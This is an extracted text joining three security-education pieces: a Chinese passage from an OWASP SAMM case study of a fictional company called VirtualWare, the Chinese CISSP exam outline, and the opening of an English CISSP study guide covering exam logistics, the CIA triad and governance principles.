全处理流程和机制,以确保应用软件安全地开发和维护。 本阶段的核心是支持调整和监管规定。这三项功能对于一个有效的长期应用 程序安全策略的基础起着至关重要的作用。一个完整的培训计划已经实施,与此 同时,长期的战略路线图也在VirtualWare内部署就位。 这个阶段的另外一个重点在于计划实施的业务操作方面。 VirtualWare的管 理层先前明确,事件响应计划的需求和专门的变更管理流程,对于长期的战略是 至关重要的。 VirtualWare将这个阶段视为他们长远将来的踏脚石。这个阶段看到了组织 实施了很多最终的度量措施,以巩固先前阶段获得的成果。从长远来看,这将确 保计划实施的处理流程、概念和控制在组织内被合理的执行,以确保他们应用程 序平台是最安全的结果。 VirtualWare选择这个阶段向他们的客户介绍了他们的新应用程序安全措 施,并向客户提供了关于应用程序安全、安全地部署应用程序和在应用程序中报 告漏洞等一系列措施的详细信息。这些活动的主要目的是向他们的客户群逐渐灌 输信心,以相信VirtualWare的应用程序是安全的,并且VirtualWare可以协助客 户以确保他们所用技术的应用程序环境是安全的。 预期目标 在该项目的这一阶段,VirtualWare执行了以下SAMM的实践与措施。 SM3 A. 引导周期性地全行业成本比较; B. 为以前的安全成本收集度量标准。 PC2 A. 为安全和遵守建立政策和标准; B. 建立项目审计实践。 EG3 A. 建立正式的应用程序安全支持门户网站; B. 建立基于角色的考试或认证制度。 SR3 A. 将安全需求写入供应商协议中; B. 为安全需求扩展审计计划。 CR3 A. 为特定应用程序问题自定义代码分析; B. 为代码审核建立发布关卡。 VM3 A. 为事件执行根源分析; B. 收集每一事件的度量指标。 OE3 A. 为操作信息扩展操作审计计划; B. 对应用程序组件执行代码签名。 93 为了实现这些成熟度等级, VirtualWare在这一阶段实施了一系列 活动计划。下列措施被执行: ✦为所有的项目建立良好定义的安全 需求和测试计划; ✦建立并实施一个事故响应计划; ✦为应用程序审核已有的报警处理过 程,并为事件捕获记录处理流程; ✦为部署应用程序安全创建一本客户 安全白皮书; ✦审核项目中已有的安全支出,并确 定每个项目是否为安全分配了恰当的 预算; ✦为应用程序角色执行最终的教育和 意识宣传计划; ✦为组织完成一个长期应用程序安全战略 路线图。 在以前的阶段中,VirtualWare已 为客户发布了一个正式的事件响应计 划,以提交在他们的代码中发现的漏 洞。在该阶段,VirtualWare提取了提 交的漏洞结果,并执行相关的评估, 以分析造成问题的原因、如何并试图 从提交的漏洞中鉴别并确定常见的问 题。 由于不断地努力,以确保应用程 序在内部和在客户网络中安全地部 署, VirtualWare为客户编写并提供了 一系列基于行业标准而建议的环境强 化白皮书。这些指导的目的是为客户 部署应用程序的最好方法提供协助。 在这一阶段,VirtualWare执行了 一个基于计算机的短期培训课程,使 现有的和新招聘的开发人员可以保持 他们在应用程序安全方面的技能。另 外,还要求所有与应用程序相关的人 员在每年参加一个为期一天的培训课 程。这就完全保证所教授给开发人员 的技能不被忘记,而且新的开发人员 在在职期间能拥有所必需的技能。 在VirtualWare内实施的最终任务 之一是完成一个“AS IS”的差距评估 和审核,并确定过去12个月的活动是 否有效。在这个短期活动中,问卷调 查被发送给所有团队成员以参与对于 SAMM的基准审核。在审核过程中发现 的弱点和优势被记录在组织的最终策 略路线图中,并为VirtualWare设置未 来十二个月的策略计划。 执行成本 在项目的这个阶段投入了大量的 内部资源和成本。这一阶段的相关成 本有两种不同类型。 内部资源需求 内部资源使用在该阶段应用程序 安全初始活动的内容创建、研讨会组 织和审核之中。资源使用以每个角色 总天数的方式展现。 开发人员 4天 业务拥有者 6天 架构师 7天 QA测试员 1天 经理 9天 安全审计员 11天 外包资源 由于VirtualWare内部知识的匮 乏,外部资源被用来协助内容创建, 以及为开发人员创建/提供培训计划。 安全顾问 22天 94 下一阶段(第12个月以后) 在过去十二个中,VirtualWare 已实施了一系列的培训和教育计划,以制定 内部的指导和政策。在保证计划实施的最后阶段,VirtualWare 开始对外发布, 并与他们的客户一起工作,以提高他们客户应用程序平台的安全性。 VirtualWare 的管理层设置了一个原始指令,以确保在公司内部开发的软件 是安全的,并确保市场意识到了已采取的安全措施,以协助客户保护他们的应用 程序平台。 为了实现这些管理目标,VirtualWare 在开始的十二个月中建立了一个有效 策略,并最终开始帮助客户以安全的形式保护他们的应用程序环境。通过不断的 发展,VirtualWare 已在组织内设置了多项举措,以确保该公司不会再出现以前 的错误习惯。这些计划包括: ✦业务拥有者和团队领导者意识到了与他们的应用程序相关的风险,并需要在应 用程序发布前解决这些风险; ✦团队领导人现在要求所有的应用程序正式通过安全处理流程,并由开发人员在 每周进行代码审核; ✦为所有的项目工作人员在每年提供培训和教育计划(包括基于计算机的培训); 另外,所有的开发人员都要求在每年至少参加一次课程; ✦为应用程序安全成立一个专门的安全领导人,负责客户沟通、客户技术文档和 指导。 随着发展,VirtualWare现在已有了一个针对软件安全性的企业文化,已作 为其软件开发生命周期的一部分,从而确保为客户开发和提供的应用程序是安全 可靠的。一个有效的处理流程已经部署,以报告漏洞并在组织需要时进行处理。 在实施的最后一个阶段,一个项目的差距评估被执行,以确定在实施过程中 发现的任何弱点。特别是由于员工的高流动性,VirtualWare需要不断地对组织 新招聘的开发人员进行培训。并为开发人员专门开展一个介绍计划,设定为解决 这个问题的一个关键目标,以让他们在组织内开始工作时就接受正式的安全培 训。这也将有助于在组织和开发团队中建立关软件于安全性的重要思想。 95 成熟度记分卡 成熟度记分卡在VirtualWare软件 保证计划实施的自我评估阶段完成。 最后的计分卡(如右图所示)代表 VirtualWare在这个为期四个阶段的项 目执行开始前和结束后的状态。 96 考试大纲 注册信息系统安全师 生效期:2018年4月 CISSP Certification Exam Outline 2 关于CISSP 注册信息系统安全师(CISSP)是全球最受广泛认可的信息安全认证。CISSP认证反映了持证者具备有效设计、 构建及管理组织整体安全态势所需的深厚信息安全技术、管理知识、技能与经验。 CISSP的公共知识体系(CBK)中包含的广泛议题确保了与信息安全领域中所有原理的相关性。通过认证的考生 展示了在以下八大知识域的能力: • 安全与风险管理 • 资产安全 • 安全架构与工程 • 通信与网络安全 • 身份与访问管理 • 安全评估与测试 • 安全运营 • 软件开发安全 经验要求 考生必须在(ISC)2 CISSP公共知识体系(CBK)八大知识域中的至少两个或两个以上领域,拥有至少5年全职工作 经验。拥有4年大学本科学历或同等学历,以及(ISC)2认可的其它证书可以抵免一年的工作经验。所有教育学位 最多只能抵免一年工作经验。 没有满足CISSP所需工作经验的考生,如果能够通过CISSP考试则可以成为(ISC)2的准会员(Associate) 。(ISC)2 的准会员可以用接下来的6年时间积累所需工作经验。 认可 CISSP是业界首张符合ANSI/ ISO/IEC 17024 国际标准要求的信息安全认证。 工作任务分析(Job Task Analysis) (ISC)2对其会员有义务维护CISSP的关联性。定期进行工作任务分析(JTA)是一项系统而关键的过程,用来确定 由CISSP安全专业人士所从事的工作。JTA的分析结果会用来更新考试。这个过程确保了考生的测试题目与目前 从业的信息安全专业人士的角色和职责密切相关。 CISSP Certification Exam Outline 3 CISSP计算机自适应测试(CAT)的考试信息 CISSP CAT 考试的权重 考试时长 考题数量 考题格式 及格线 可提供的考试语言 测试中心 3小时 100道至150道 多项选择和高级创新型考题 1000分中得到700分 英语 (ISC)2 授权的、且由 PPC 和 PVTC 精选的 Pearson VUE 测试中心 领域 平均权重 1.安全与风险管理 15% 2.资产安全 10% 3.安全架构与工程 13% 4.通信与网络安全 14% 5.身份与访问管理 (IAM) 13% 6.安全评估与测试 12% 7.安全运营 13% 8.软件开发安全 10% 总计: 100% CISSP的所有英语考试都采用计算机自适应测试(CAT)。CISSP的其它语种的考试 采用线性和固定格式的测试。欲了解CISSP的CAT详情,请访问: www.isc2.org/ certificatons/CISSP-CAT。 CISSP Certification Exam Outline 4 CISSP线性考试信息 CISSP线性考试权重 考试时长 考题数量 考题格式 及格线 可提供的考试语言 测试中心 6小时 250道 多项选择和高级创新型考题 1000分中得到700分 法语、德语、巴西葡萄牙语、西班牙语、日语、简体中文、 韩语 (ISC)2 授权的、且由 PPC 和 PVTC 精选的 Pearson VUE 测 试中心 领域 权重 1.安全与风险管理 15% 2.资产安全 10% 3.安全架构与工程 13% 4.通信与网络安全 14% 5.身份与访问管理 (IAM) 13% 6.安全评估与测试 12% 7.安全运营 13% 8.软件开发安全 10% 总计: 100% CISSP Certification Exam Outline 5 领域 1: 安全与风险管理 1.1 理解和运用保密性、完整性和可用性的概念 1.2 评估和应用安全治理的原理 1.3 确定合规要求 » 合约、法律、行业标准和监管的要求 » 隐私的要求 1.4 理解与信息安全的全球背景相关的法律和监管问题 1.5 理解、遵从与提升职业道德 » (ISC)2 职业道德规范 » 组织的道德规范 1.6 开发、撰写与实现安全政策、标准、流程和指南 1.7 对业务连续性(Business Continuity)进行识别、分析及优先级排序 » 制定并记录范围和计划 » 经营影响分析 (BIA) » 将安全功能与商业策咯、目标、使命和宗旨相连接 » 组织的流程 (例如购置、剥离、治理委员会) » 组织的角色与职责 » 安全控制框架 » 谨慎考虑/恪尽职守 » 网络犯罪和数据泄露 » 许可和知识产权的要求 » 进口/出口控制 » 跨境数据流 » 隐私 CISSP Certification Exam Outline 6 1.8 促进与实行人员安全的策略与流程 1.9 理解与运用风险管理的概念 1.10 理解与运用威胁建模的概念和方法论 1.11 将基于风险的管理概念运用到供应链 1.12 建立与维护安全意识、教育和培训计划 » 员工筛选与雇佣 » 雇佣合约与政策 » 入职与离职程序 » 供应商、顾问与承包商的合约与控制 » 合规策略要求 » 隐私策略要求 » 识别威胁与漏洞 » 风险评估/分析 » 风险响应 » 对策选择与实现 » 控制措施适用的类型(例如:预防措施、检测措施和 纠正措施 » 安全控制评估 (SCA) » 监控与测量 » 资产估价 » 汇报 » 持续提高 » 风险框架 » 威胁建模的方法论 » » 威胁建模的概念 » 与硬件、软件和服务相关的风险 » » 第三方评估与监测 » » 最低安全需求 » 服务水平要求 » 安全意识宣贯与培训的方法和技术 » »定期内容审查 » »方案效果评价 CISSP Certification Exam Outline 7 领域 2: 资产安全 2.1 识别与分类信息和资产 2.2 确定与维护信息和资产所有权 2.3 保护隐私 2.4 确保适当的资产保留 2.5 确定数据安全控制 2.6 建立信息和资产的处理要求 » 数据所有者 » 数据所有者 » 数据残留 » 数据收集限制 » 理解数据状态 » 定界与定制 » 标准选择 » 数据保护的方法 » 数据分级 » 资产分级 CISSP Certification Exam Outline 8 领域 3: 安全架构与工程 3.1 使用安全设计原理来实施与管理工程的进程 3.2 理解安全模型的基本概念 3.3 基于系统安全需求选择控制措施 3.4 理解信息系统的安全功能(例如:内存保护、可信平台模块(TPM)、加密/解密) 3.5 评估与缓解安全架构、设计和解决方案要素的漏洞 3.6 评估和缓解Web系统中的漏洞 3.7 评估与缓解移动系统的漏洞 3.8 评估与缓解嵌入式设备的漏洞 3.9 运用密码学 3.10 将安全原理运用到场所与设施的设计上 » 基于客户端的系统 » 基于服务端的系统 » 数据库系统 » 密码系统 » 工业控制系统(ICS) » 基于云端的系统 » 分布式系统 » 物联网(IoT) » 密码生命周期 (例如:密钥管理、算法选择) » 加密方法(例如:对称、非对称、椭圆曲线) » 公钥基础设施 (PKI) » 密钥管理实践 » 数字签名 » 抗抵赖性 » 完整性 (例如:哈希函数) » 理解密码攻击方法 » 数字版权管理(DRM) CISSP Certification Exam Outline 9 3.11 实施场所与设施的安全控制 » 配线柜/中继配线设施 » 服务器机房/数据中心 » 媒体储存设施 » 证据储存 » 限制区与工作区的安全 CISSP Certification Exam Outline 10 领域 4: 通信与网络安全 4.1 在网络架构中实施安全设计原则 4.2 网络组件安全 4.3 根据设计实施安全通信通道 » 开放系统互连(OSI)和传输控制协议 / 互联网协 议(TCP/IP)模型 » 互联网协议(TCP/IP)网络 » 多层协议的作用 » 聚合协议 » 软件定义网络 » 无线网络 » 硬件操作 » 传输介质 » 网络访问控制(NAC)设备 » 端点安全 » 内容配送网 » 语音 » 多媒体协作 » 远程访问 » 数据通信 » 虚拟化网络 CISSP Certification Exam Outline 11 领域 5: 身份与访问管理 (IAM) 5.1 控制对资产的物理和逻辑访问 » 信息 » 系统 » 设备 » 设施 5.2 管理对人员、设备和服务的身份识别与验证 5.3 集成身份为第三方服务 5.4 实施和管理授权机制 5.5 管理身份和访问配置生命周期 » 用户访问审查 » 系统账户访问审查 » 配置与清除配置 » 实施身份管理 » 单/多因素身份验证 » 可核查性 » 会话管理 » 身份注册与证明 » 联合身份管理 (FIM) » 凭证管理系统 » 内部部署 » 云计算 » 联合 » 基于角色的访问控制 (RBAC) » 基于规则的访问控制 » 强制访问控制 (MAC) » 自主访问控制 (DAC) » 基于属性的访问控制 (ABAC) CISSP Certification Exam Outline 1212 6.1 设计和验证评估、测试和审计策略 6.2 对安全控制进行测试 6.3 收集安全流程数据 (如:技术和管理) 6.4 分析测试输出并生成报告 6.5 执行或协助安全审计 » 漏洞评估 » 渗透测试 » 日志审查 » 模拟交易 » 代码审查和测试 » 误用案例测试 » 测试覆盖率分析 » 接口测试 » 内部 » 外部 » 第三方 » 内部 » 外部 » 第三方 » 账户管理 » 管理层审查和批准 » 关键业绩和风险指标 » 备份验证数据 » 信息安全意识宣贯 » 灾难恢复 (DR) 和业务连续性 (BC) 领域 6: 安全评估与测试 CISSP Certification Exam Outline 13 7.1 理解和支持调查 7.2 了解调查类型的要求 7.3 进行日志记录和持续监测活动 7.4 安全配置资源 7.5 理解和应用基本的安全运营概念 7.6 应用资源保护技术 » 介质管理 » 硬件和软件资产管理 领域 7: 安全运营 » 证据采集和处理 » 报告和记录 » 调查技术 » 数字取证工具、策略和程序 » 入侵检测和防御 » 安全信息和事件管理 (SIEM) » 不间断持续监测 » 输出流量持续监测 » 资产清单 » 资产管理 » 配置管理 » 因需可知 / 最低权限 » 职责分离 » 特权帐户管理 » 岗位轮换 » 信息生命周期 » 服务水平协议(SLA) » 行政 » 刑事 » 民事 » 监管 » 行业标准 CISSP Certification Exam Outline 14 7.7 执行事件管理 7.8 检测和预防措施的运营及维护 7.9 实施和支持补丁和漏洞管理 7.10 理解并参与变更管理流程 7.11 实施灾难恢复(DR)过程 7.12 实施灾难恢复 (DR) 流程 7.13 测试灾难恢复计划 (DRP) 7.14 参与业务连续性 (BC) 计划制定和演练 7.15 实施和管理物理安全 7.16 解决人员安全问题 » 检测 » 响应 » 缓解 » 报告 » 恢复 » 补救 » 经验教训 » 防火墙 » 入侵检测和防御系统 » 白名单 / 黑名单 » 第三方提供的安全服务 » 沙箱 » 蜜罐 / 蜜网 » 反恶意软件 » 备份存储策略 » 恢复站点策略 » 多个处理站点 » 系统弹性、高可用性、服务质量 (QoS) 和容错 » 响应 » 人员 » 通信 » 评估 » 恢复 » 培训和信息安全意识宣贯 » 书面测试/测试 » 穿行测试 » 模拟测试 » 并行测试 » 全面中断测试 » 外围安全控制 » 内部安全控制 » 旅行 » 安全培训和意识 » 应急管理 » 胁迫 CISSP Certification Exam Outline 15 领域 8: 软件开发安全 8.1 理解安全并将其融入软件开发生命周期(SDLC)中 8.2 开发环境中识别和应用安全控制 8.3 评估软件安全的有效性 8.4 评估获得软件对安全的影响 8.5 定义并应用安全编码准则和标准 » 开发方法 » 成熟度模型 » 运营和维护 » 变更管理 » 集成产品团队 » 软件环境的安全 » 配置管理作为安全编码的一个方面 » 审核和变更记录 » 风险分析和缓解 » 源代码级安全弱点和漏洞 » 应用编程接口安全 » 安全编码实践 CISSP Certification Exam Outline 16 附加考试信息 补充参考 鼓励应试者通过回顾有关CBK的相关资源,并找出可能需要额外注意的研究领域来补充他们的教 育和经验。 在 www.isc2.org/certifications/References 网站中查看补充参考的完整书单 考试政策和规程 (ISC)² 建议 CISSP 考生在报名参加考试前到 www.isc2.org/Register-for-Exam 阅读有关考试政 策和规程重要信息的详尽细目。 法律信息 有关 (ISC)² 法律政策的任何问题, 请致信 legal@isc2.org 与 (ISC)² 法律部门联系。 其他问题? (ISC)² 考试服务 311 Park Place Blvd, Suite 400 Clearwater, FL 33759 (ISC)² 美洲区 Tel: +1.866.331.ISC2 (4722) Email: info@isc2.org (ISC)² 亚太区 Tel: +(852) 28506951 Email: isc2asia@isc2.org (ISC)² 欧洲、中东及非洲地区 Tel: +44 (0)203 300 1625 Email: info-emea@isc2.org v0118 16 1 CISSP Exam Study Guide Brian Svidergol RHEL3, VCP, NCIE-SAN, MCT, MCSE 2 Table of Contents Introduction ………………………………………………………………………………………………………………………………………………………..……..………6 Domain 1. Security and Risk Management ………………………………………………………………………………………………………..……….……8 1.1 Understand and apply concepts of confidentiality, integrity and availability ………………...….……………………..……….……8 1.2 Evaluate and apply security governance principles………....……………………………………………….……………………..……….……8 1.3 Determine compliance requirements ………………………………………………….................…………….…………………………….……10 1.4 Understand legal and regulatory issues that pertain to information security in a global context ……………………..……10 1.5 Understand, adhere to, and promote professional ethics ………..................................................……….………………..……11 1.6 Develop, document, and implement security policy, standards, procedures and guidelines ..….………….....……..……12 1.7 Identify, analyze, and prioritize Business Continuity (BC) requirements ….………………..…...........................................…12 1.8 Contribute to and enforce personnel security policies and procedures ….…................................…….………………..……13 1.9 Understand and apply risk management concepts ……………………….………………………………………………………..……..……14 1.10 Understand and apply threat modeling concepts and methodologies ……………………......................………………..……17 1.11 Apply risk-based management concepts to the supply chain ……………………….………...........................……………..……18 1.12 Establish and maintain a security awareness, education, and training program …………..…………….………….……..……19 Domain 1 Review Questions ……………………….………………………………………………..………………………………………….………………..……20 Answers to Domain 1 Review Questions …………………………………………..…………………………………………………….………………..……21 Domain 2. Asset Security ………………………………………………………………..….…………………………………………………….………………..……22 2.1 Identify and classify information and assets …………………………….…………………....…………………………….………………..……22 2.2 Determine and maintain information and asset ownership ……………………....................………………….………………..……23 2.3 Protect privacy ……………………….……………………………………………………….…………………………………………….………………..……23 2.4 Ensure appropriate asset retention ……………………….……………...........................................…………………………………..……24 2.5 Determine data security controls ……………………….……………………..………………………………………………….………………..……24 2.6 Establish information and asset handling requirements ………………………….......................……………….………………..……25 Domain 2 Review Questions ……………………….…………………………………………………..……………………………………….………………..……27 Answers to Domain 2 Review Questions ……………………….…………………….………………………………………………….………………..……28 3 Domain 3. Security Architecture and Engineering …………............…….…………………………………………………….…….…………..……29 3.1 Implement and manage engineering processes using secure design principles ……………………….……….…………..……29 3.2 Understand the fundamental concepts of security models ……………………….………………………………………….………..……30 3.3 Select controls based upon systems security requirements ……………………..............................................…..………..……30 3.4 Understand the security capabilities of information systems ………………….......…….…………………………………………..……31 3.5 Assess and mitigate the vulnerabilities of security architectures, designs and solution elements …………………………32 3.6 Assess and mitigate vulnerabilities in web-based systems ……………………….……………………………....................……..……34 3.7 Assess and mitigate vulnerabilities in mobile systems ……………………….………………………………………........................……34 3.8 Assess and mitigate vulnerabilities in embedded devices ……….………………..............................................................……35 3.9 Apply cryptography ……………..............................................………….…………………………………………………….………………..……35 3.10 Apply security principles to site and facility design ……………………….……………………………………………......................……39 3.11 Implement site and facility security controls …….........………………………………………...……………………….………………..……39 Domain 3 Review Questions ……………………….…………………………………...........................................………………….………………..……42 Answers to Domain 3 Review Questions ……………………......................….…………………………………………………….………………..……43 Domain 4. Communication and Network Security ………….…………….………...…………………………………………….………………..……44 4.1 Implement secure design principles in network architecture ……………………….…………………………………………….……..…44 4.2 Secure network components ……………………….……………..............................……………………………………….………………..……46 4.3 Implement secure communication channels according to design ……………………….………………..…………………........……48 Domain 4 Review Questions ……………………….………...........................................…………………………………………….………………..……49 Answers to Domain 4 Review Questions ……………………….………………......................…………………………………….………………..……50 Domain 5. Identity and Access Management (IAM) ………………………...............………………………………………….………………..……51 5.1 Control physical and logical access to assets ………………....……….…………………………………………………….………………..……51 5.2 Manage identification and authentication of people, devices and services ………….……………………………………….....……52 5.3 Integrate identity as a third-party service ...........................….……………………………………………….………….………………..……54 5.4 Implement and manage authorization mechanisms ……………………….…………………………………………………….………..……56 5.5 Manage the identity and access provisioning lifecycle ……………………….……………………………………………………....…..……57 Domain 5 Review Questions ……………………...........................................….…………………………………………………….………………..……59 4 Answers to Domain 5 Review Questions ………………….....................…….…………………………………………………….………………..……60 Domain 6. Security Assessment and Testing ………………...............……….…………………………………………………….………………..……61 6.1 Design and validate assessment, test and audit strategies …………………………………………………………………...………..……61 6.2 Conduct security control testing ……………….........................……….…………………………………………………….………………..……61 6.3 Collect security process data ………………..............................……….…………………………………………………….………………..……63 6.4 Analyze test output and generate reports ..……………………………………………………………………….………….………………..……64 6.5 Conduct or facilitate security audits ……………………….……………………………………………………………….…………….………..……64 Domain 6 Review Questions …………………...........................................…….…………………………………………………….………………..……65 Answers to Domain 6 Review Questions ……………………….….....................………………………………………………….………………..……66 Domain 7. Security Operations ……………………….......................................…………………………………………………….………………..……67 7.1 Understand and support investigations ……………………............….…………………………………………………….………………..……67 7.2 Understand the requirements for different types of investigations ……………………….……………………………..………..……68 7.3 Conduct logging and monitoring activities ………………….......…….…………………………………………………….………………..……69 7.4 Securely provision resources …………………………..................……….…………………………………………………….………………..……70 7.5 Understand and apply foundational security operations concepts ……………………….………………………………………..……70 7.6 Apply resource protection techniques ………………...........……….….…………………………………………………….………………..……72 7.7 Conduct incident management ……………..........................………….…………………………………………………….………………..……73 7.8 Operate and maintain detective and preventative measures ……………………………………………………….………………..……74 7.9 Implement and support patch and vulnerability management ……………………….……………………………………………...……75 7.10 Understand and participate in change management processes ……………………….…………………………………………..……76 7.11 Implement recovery strategies ……………........................………….…………………………………………………….………………..……77 7.12 Implement disaster recovery (DR) processes ……………………….….........…………….…………………………….………………..……78 7.13 Test disaster recovery plans (DRP) ……………………….….............................…………………..…………………….………………..……79 7.14 Participate in business continuity (BC) planning and exercises ……………………….…………………………………………………80 7.15 Implement and manage physical security ……………………….……......……………………………………………….………………..……81 7.16 Address personnel safety and security concerns ……………………….………………….…………………………………....………..……81 Domain 7 Review Questions ……………………….………...........................................…………………………………………….………………..……83 5 Answers to Domain 7 Review Questions ……………………….…….....................……………………………………………….………………..……84 Domain 8. Software Development Security …………………….................….…………………………………………………….………………..……85 8.1 Understand and apply security in the software development lifecycle ……………………….……………………………..…..……85 8.2 Enforce security controls in development environments ……………………….…………………….………………………………...……87 8.3 Assess the effectiveness of software security ……………………..….…………………………………………………….………………..……88 8.4 Assess security impact of acquired software ………....……………….…………………………………………………….………………..……88 8.5 Define and apply secure coding guidelines and standards ………....……………….………………………………………..………..……88 Domain 8 Review Questions ……………………….……………...........................................……………………………………….………………..……90 Answers to Domain 8 Review Questions ……………………......................….…………………………………………………….………………..……91 Useful References ……………………….………………………………….............................................................………………….………………..……92 About the Author ……………………….…………………...............................................................………………………………….…..…………..……93 About Netwrix ……………………….………....................................................................…………………………………………….………………..……93 6 Introduction Exam Overview Preparing to take the Certified Information Systems Security Professional (CISSP) exam requires a great deal of time and effort. The exam covers eight domains: 1. Security and Risk Management 2. Asset Security 3. Security Architecture and Engineering 4. Communication and Network Security 5. Identity and Access Management (IAM) 6. Security Assessment and Testing 7. Security Operations 8. Software Development Security To qualify to take the exam, you must generally have at least five years of cumulative, paid, full-time work experience in two or more of the eight domains. However, you can satisfy the eligibility requirement with four years of experience in at least two of the eight domains if you have either a four-year college degree or an approved credential or certification. See https://www.isc2.org/Certifications/CISSP/Prerequisite-Pathway for a complete list of approved credentials and certifications. The exam is long, especially compared with other industry certifications. You can take it in English or another language:  The English language exam is a computerized adaptive testing (CAT) exam, so it changes based on your answers. You get up to 3 hours to complete a minimum of 100 questions and a maximum of 150 questions.  Exams in languages other than English remain in a linear format. You get up to 6 hours to complete a series of 250 questions. You must score 700 points or more to pass the exam. 7 How to Use this Study Guide Using multiple study sources and methods improves your chances of passing the CISSP exam. For example, instead of reading three or four books, you might read one book, watch a series of videos, take some practice test questions and read a study guide. Or you might take a class, take practice test questions and read a study guide. Or you might join a study group and read a book. The combination of reading, hearing and doing helps your brain process and retain information. If your plan is to read this study guide and then drive over to the exam center, you should immediately rethink your plan! There are a couple of ways you can use this study guide:  Use it before you do any other studying — Read it thoroughly. Assess your knowledge as you read. Do you already know everything being said? Or are you finding that you can’t follow some of the topics easily? Based on how your reading of the study guide goes, you’ll know which exam domains to focus on and how much additional study time you need.  Use it as the last thing you read prior to taking the exam — Maybe you’ve taken a class, read a book and gone through a thousand practice test questions, and now you’re wondering if you are ready. This study guide might help you answer that question. At a minimum, everything in this study guide should be known to you, make sense to you and not confuse you. Note that a study guide like this doesn’t dive deep enough to teach you a complete topic if you are new to that topic. But it is a very useful preparation tool because it enables you to review a lot of material in a short amount of time. In this guide, we’ve tried to provide the most important points for each of the topics, but it cannot include the background and details you might find in a 1,000-page book. Recent Changes to the Exam On April 15, 2018, the agency that provides the CISSP exam, the International Info System Security Certification Consortium, released an updated set of exam objectives (the exam blueprint). This blueprint is available at https://www.isc2.org/-/media/ISC2/Certifications/Exam-Outlines/CISSP-Exam-Outline-121417--Final.ashx. While most of the exam topics remain the same, there are some minor changes to reflect the latest industry trends and information. Most books for the new version of the exam will be released in May 2018 or later. This study guide has been updated to reflect the new blueprint. The updates are minor: A few small topics have been removed, a few new ones have been added, and some items have been reworded. What does this mean for you if you are preparing to take the exam? If you have already spent a good amount of time preparing, you might just need to supplement your study with some sources that explain the new and revised material. But if you are just starting to study, consider waiting until the updated guides are released. 8 Domain 1. Security and Risk Management 1.1 Understand and apply concepts of confidentiality, integrity and availability Confidentiality, integrity and availability make up what’s known as the CIA triad. The CIA triad is a security model that helps organizations stay focused on the important aspects of maintaining a secure environment.  Confidentiality. Sensitive data, including personally identifiable information (PII) like identification numbers and bank account numbers, must be kept confidential. It’s important to understand that confidentiality is different from secrecy. If you aren’t aware something exists (such as data or a web service), then it is a secret. But keeping something secret, by itself, doesn’t ensure confidentiality. You’ve probably seen stories of attackers (or even regular web surfers) stumbling across “secret” web sites or information, sometimes by accident. To ensure confidentiality, you must make certain that even if someone is aware that something valuable exists (such as a store that processes credit card transactions or a file share with sensitive data), they can’t get to it. At a high level, you use access controls — locked doors, folder permissions and two-factor authentication — to maintain confidentiality. At a lower level, you use encryption to protect data at rest, hashing to protect data in motion, and physical security for data in use (privacy screens or physical separation between data in use and unauthorized persons). You can use a “default deny” configuration so that unless somebody has been expressly authorized to access data, they are denied access.  Integrity. You also have to make certain that data isn’t changed improperly. Encryption helps ensure the integrity of data at rest, but it isn’t the best option for data in motion. Instead, hashing is typically used. Hashing data assigns the data a numeric value, which is calculated at the source before the transfer and then again by the recipient after the transfer; a match proves data integrity. Algorithms such as SHA256 and SHA512 are commonly used for hashing; older algorithms, such as SHA-1, have become susceptible to attack and therefore are rarely used.  Availability. To ensure high availability of services and data, use techniques like failover clustering, site resiliency, automatic failover, load balancing, redundancy of hardware and software components, and fault tolerance. For example, they can help you thwart a denial of service (DoS) attack that aims to deny the availability of a service or data by overloading a system with invalid requests or requests that take a long time to process. 1.2 Evaluate and apply security governance principles To establish security governance principles, adopt a framework such as the one from the National Institute of Standards and Technology (NIST). Be sure the framework you choose includes the following:  Alignment of security function to strategy, goals, mission, and objectives. An organization has a mission and uses strategy, plans and objectives to try to meet that mission. These components flow down, with the ones below supporting the ones above. Business strategy is often focused 5 or more years out. In the shorter term, typically 1 to 2 years, you have tactical plans that are aligned with the strategic plan. Below that are operational plans — the detailed tactical plans that keep the business running day to day. Objectives are the closest to the ground and represent small efforts to help you achieve a mission. For example, a car manufacturer’s mission might be to build and sell as many high-quality cars as possible. The objectives might include expanding automation to reduce the 9 total build time of a car and expanding from 2 factories to 3. A security framework must closely tie to the organization’s mission and objectives, enabling the business to complete its objectives and advance the mission while securing the environment based on risk tolerance. Continuing with the car manufacturer example, the security framework must enable the expansion of automation. If the security framework is such that automation cannot be expanded, then the security framework isn’t sufficiently aligned with the mission and objectives.  Organizational processes (acquisitions, divestitures, governance committees). Be aware of the risks in acquisitions (since the state of the IT environment to be integrated is unknown, due diligence is critical) and divestitures (you need to determine how to split the IT infrastructure and what to do with identities and credentials). Understand the value of governance committees (vendor governance, project governance, architecture governance, etc.). Executives, managers and appointed individuals meet to review architecture, projects and incidents (security or otherwise), and provide approvals for new strategies or directions. The goal is a fresh set of eyes, often eyes that are not purely focused on information security.  Organizational roles and responsibilities. There are multiple roles to consider. Management has a responsibility to keep the business running and to maximize profits and shareholder value. The security architect or security engineer has a responsibility to understand the organization’s business needs, the existing IT environment, and the current state of security and vulnerability, as well as to think through strategies (improvements, configurations and countermeasures) that could maximize security and minimize risk. There is a need for people who can translate between technical and non-technical people. Costs must be justified and reasonable, based on the organization’s requirements and risk.  Security control frameworks. A control framework helps ensure that your organization is covering all the bases around securing the environment. There are many frameworks to choose from, such as Control Objectives for Information Technology (COBIT) and the ISO 27000 series (27000, 27001, 27002, etc.). These frameworks fall into four categories:  Preventative — Preventing security issues and violations through strategies such as policies and security awareness training  Deterrent — Discouraging malicious activities using access controls or technologies such as firewalls, intrusion detection systems and motion-activated cameras  Detective — Uncovering unauthorized activity in your environment  Corrective — Getting your environment back to where it was prior to a security incident  Due care / due diligence. Ensure you understand the difference between these two concepts. Due care is about your legal responsibility within the law or within organizational policies to implement your organization’s controls, follow security policies, do the right thing and make reasonable choices. Due diligence is about understanding your security governance principles (policies and procedures) and the risks to your organization. Due diligence often involves gathering information through discovery, risk assessments and review of existing documentation; creating documentation to establish written policies; and disseminating the information to the organization. Sometimes, people think of due diligence as the method by which due care can be exercised. After you establish and document a framework for governance, you need security awareness training to bring everything together. All new hires should complete the security awareness training as they come on board, and existing employees should recertify on it regularly (typically yearly). 10 1.3 Determine compliance requirements Many organizations need to comply with applicable laws and industry standards. Noncompliance can mean fines, jail time for executives or even the end of a business. To achieve compliance, you must focus on controls. Although most common standards are vague about implementation, a few provide detailed documentation to help organizations achieve compliance. For example, NIST provides a guide for complying with federal information standards.  Contractual, legal, industry standards, and regulatory requirements. Understand the legal systems. Civil law is most common; rulings from judges typically do not set precedents that impact other cases. With common law, which is used in the USA, Canada, the UK and former British colonies, rulings from judges can set precedents that have significant impact on other cases. 